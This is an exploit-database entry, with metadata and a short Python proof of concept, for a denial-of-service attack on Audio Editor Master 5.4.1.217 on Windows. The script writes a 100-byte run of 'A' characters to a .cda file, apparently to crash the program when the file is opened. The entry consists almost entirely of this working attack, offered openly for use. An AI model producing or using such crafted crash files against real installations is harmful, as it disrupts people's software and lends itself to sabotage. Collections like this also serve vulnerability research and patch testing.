Audio Editor Master 5.4.1.217 - Denial of Service
Author: Onying
type: dos
platform: windows
port:
date_added: 2012-06-06
date_updated: 2012-06-07
verified: 1
codes: OSVDB-82679
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-06-07-at-94522-am.png
application_url: http://www.exploit-db.comAudio-Editor-Master.exe
#!/usr/bin/python
#
# Exploit Title: Audio Editor Master 5.4.1.217 Denial Of Service Vulnerability
# software: Audio Editor Master
# version : 5.4.1.217
# Tested on: Windows XP SP3
# link: http://www.audioeditor.com
# Author: Onying (@onyiing)
# Blog: otakku-udang.blogspot.com
# from : Information Security Shinobi Camp (http://is2c-dojo.com)
junk ="\x41"*100
textfile = open("onyiing.cda" , 'w')
textfile.write(junk)
textfile.close()